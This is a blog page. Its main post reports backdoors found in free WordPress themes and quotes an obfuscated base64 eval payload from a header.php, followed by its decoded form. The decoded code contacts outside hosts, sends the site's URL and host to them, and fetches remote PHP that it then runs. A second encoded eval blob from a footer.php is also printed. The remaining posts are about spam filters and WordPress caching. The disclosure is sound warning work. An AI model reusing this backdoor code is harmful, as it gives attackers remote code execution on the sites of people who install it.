header

WordPress Theme Arbitrary Code Execution

A friend of mine has a WordPress weblog that displayed something fishy on it. Something to the effect of

Unable to fclose(), not a valid resource

That struck me as odd, so I dug a little deeper, and saw this in his theme’s header.php (I added the newlines for displaying purposes)

<body><?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja
29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBRE
Q3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJ
FIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3M
EQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5Qzg
wRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSA
id3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5
MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0
RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYx
MkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVu
Y29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkU
jNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTN
FRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQ
TgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3
d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2Ln
BocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hU
VFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQ
UU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Which decodes to (again with the newlines)

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3))
 $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2,
 $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2";
 @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  $R3E33E017CD76B9B7E6C7364FB91E2E90 =
 @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115);  @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else {  $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0";
  $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=".
 urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']);  @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } 
fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

Classic arbitrary code execution attack, behind a few levels of masking.

I looked at his other themes, and saw three others with the same issue. In another theme, I saw this in footer.php

eval(gzinflate(base64_decode('
bZCxisMwEERrG/wPgz8g6o2iwDV3XZpAajla24tt
SScpEQf5+MjxlRm2WGbYB7MnVRVBGn6AzbEdnEsU
WtXUKCO9gqHIoyWD/q+D1JgCDcd2Ssl3QuScD6ue
6ffOt/lwc2urznZhS7hSHzkRvu68GApSaAVtzWdE
pn5yMbEdR6I57qBCwM/uYjv/3iI8oR+aF90vhCEQ
QacOF+c/YZPz2aeJVvpH4uqC8YFixOVtb1wpSsum
lqL8oPRu6qrad7xVktML
')));

Which doesn’t turn out to be as bad, only few links (run it yourself if you’re interested, I’m not into promoting badness). But still, the fact that it’s masked is very shady.

These themes were obtained from WPSphere.com and FreeWordPressLayouts.com, respectively. The links were purposefully omitted, they don’t need any more pagerank. Who knew people were so shady. I urge those looking to get WordPress Themes to stay away from sites such as these.

Edit: I found a post on GigaOM that found this same issue, and even mentions WPSphere.com by name. I’m glad I’m not the first to find it.

Comments (3)

Beta Testing Defensio

Akismet isn’t perfect. I’ve been using it to block my spam since it became available. One of its major problems is that it often lets through what Defensio calls URL-less spam, and sometimes less through spam WITH urls, which I don’t quite understand.

Anyway, so right after this post, I’ll be disabling Akismet and turning on Defensio Beta. I’ll be monitoring spam incoming, ham incoming, speed of page loads, etc. If you notice anything funky, let me know 🙂

Comments (0)

Testing WP-Cache

This is only a test 🙂

If there are any problems, please let me know!

Comments (7)

Akismet Annoyances

I use Akismet on my WordPress site to catch spam. At first I was very impressed with it. When I first installed it (a few weeks after it was announced), it worked very well; it would catch all spam and let all ham through. I’ve made sure to have the latest version of the Akismet plugin for WordPress installed. Since 99% of the spam determining is done on the akismet server side, there haven’t been any client side updates in some time. My Akismet setup has caught 25,521 spam comments so far.

But recently, it has been misbehaving on my site and the sites of some of my friends that use it. I get 5-10 spam comments a week that Akismet thinks is ham, and every once in awhile I’ll get a ham comment that Akismet thinks is spam. Then it will place SOME items in moderation which are VERY obviously spam (100+ links).

It’s annoying, and I wish Akismet would get it together. For now, I’ll be patient and keep flagging comments accordingly. After all, there’s still nothing better…

Edit: I found an announcement for Defensio, which could be an Akismet replacer. I requested information and perhaps inclusion in the beta. This sounds promising.

Comments (1)

WordPress performs poorly.

When I first came into web development and blogging, I thought WordPress was great. It handled many of the things that I needed handling, and it did it intuitively and fairly quickly. Since then I’ve had lots of experience with lack of performance, and optimizing web code for performance. Let’s face it, we don’t all have dedicated quad cores for webhosting, nor do we necessarily have separate boxes for DB server and webserver.

WordPress is not optimized for large amounts of traffic. There is seemingly no caching (within WordPress) whatsoever. On a normal pageload it makes no fewer than 10 trips back to the database. That’s why if you see a non protected WordPress site “dugg”, or “slashdotted”, it will be down after only a moderate number of concurrent hits.

WP-Cache is a plugin for WordPress that caches pages and posts, not requiring WordPress to hit the database upon pageloads. I couldn’t get it to work with my WordPress setup after about a half hour of tinkering, but in theory that would make WordPress a robust, non-performance-hog piece of software. But the point is that there should be no excuses to creating poorly performing code. There shouldn’t have to be a user-submitted-tweak that “fixes” software to not be slow.

Maybe we’ll see it when the WordPress team finally considers it high priority, perhaps by WordPress version 5.9.2.

Comments (6)


blogtimes